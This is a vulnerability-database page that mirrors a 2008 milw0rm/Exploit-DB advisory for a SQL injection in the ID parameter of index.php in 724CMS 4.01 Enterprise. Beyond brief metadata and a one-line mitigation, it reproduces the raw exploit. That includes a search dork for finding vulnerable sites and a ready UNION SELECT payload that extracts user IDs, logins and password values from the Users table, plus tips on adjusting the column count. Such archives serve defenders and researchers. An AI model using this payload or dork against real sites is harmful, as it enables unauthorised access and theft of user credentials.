724CMS - exploit.company

vendor:

724CMS

by:

Lidloses_Auge

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: 724CMS

Affected Version From: 04.01

Affected Version To: 04.01

Patch Exists: NO

Related CWE: N/A

CPE: 724cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

724CMS <= 4.01 Enterprise - SQL Injection Vulnerability

724CMS version 4.01 Enterprise is vulnerable to SQL injection. The vulnerability exists in the 'ID' GET parameter of the 'index.php' document. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The number of columns isn't always 28. In some cases it can be also about 37. Check before you try. Some of 'em are blind injections.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize all user input and escape special characters.

Source

Exploit-DB raw data:

###################################################################################
#										  #
#           724CMS <= 4.01 Enterprise  - SQL Injection Vulnerability              #
#										  #
#    found by:       Lidloses_Auge 					          #
#    Date:           07.04.2008							  #
#    Greetz to:      free-hack.com						  #
#										  #
###############################################################################################################################################
#																	      #
# Vulnerability:															      #
#																	      #
#    Document:      index.php														      #
#    GET-Parameter: ID														              #
#																	      #
# Dork:																	      #
#																	      #
#    724CMS + "Version 4.01"                    											      #
#																	      #
# Example:																      #
#																	      #
#    http://[target]/index.php?ID=null+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x202d20,ID,User_Login,User_Password),13,14,	      #
#    15,16,17,18,19,20,21,22,23,24,25,26,27,28+FROM+Users--							                              #
#																	      #
# Notes:																      #
#																	      #
#    The number of columns isn't always 28. In some cases it can be also about 37. Check before you try. Some of 'em are blind injections.    #
#																	      #
###############################################################################################################################################

# milw0rm.com [2008-04-07]